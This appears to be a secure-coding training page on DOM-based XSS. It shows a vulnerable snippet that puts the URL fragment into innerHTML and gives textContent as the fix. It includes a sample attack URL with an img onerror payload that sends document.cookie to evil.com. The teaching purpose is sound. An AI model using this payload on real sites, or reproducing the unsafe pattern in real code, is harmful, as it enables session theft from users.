DOM-based XSS

Client-side JavaScript processes URL fragment unsafely.

HIGHHard

Vulnerable Codejavascript

1// Client-side JavaScript
2const searchTerm = window.location.hash.substring(1);
3document.getElementById('search-term').innerHTML = 'Searching for: ' + searchTerm;
4
5// URL: https://site.com/search#laptop
6// Displays: "Searching for: laptop"

Understanding the Issue

DOM-based XSS happens entirely in the browser. The malicious payload in the URL fragment (#) never reaches the server, making it invisible to server-side security. Use textContent instead of innerHTML when displaying user input.

Client-Side Only Attack

Attacker crafts URL that executes script without server involvement

Malicious Input

https://trusted-site.com/search#<img src=x onerror="fetch('https://evil.com?c='+document.cookie)">

Impact

✓ Victim clicks link to trusted site
✓ URL fragment processed by JavaScript
✓ Script executes in victim's browser
✓ Server logs show nothing suspicious

Technical Details

Vulnerability Type: Cross-Site Scripting (XSS)
Severity: HIGH
Language: Javascript
CWE: CWE-79
OWASP: A03:2021 - Injection

DOM-based XSS

Understanding the Issue

How Attackers Exploit This

Client-Side Only Attack

Finding the Vulnerability(3 hints)

Technical Details

DOM-based XSS

Understanding the Issue

How Attackers Exploit This

Client-Side Only Attack

Finding the Vulnerability(3 hints)

Technical Details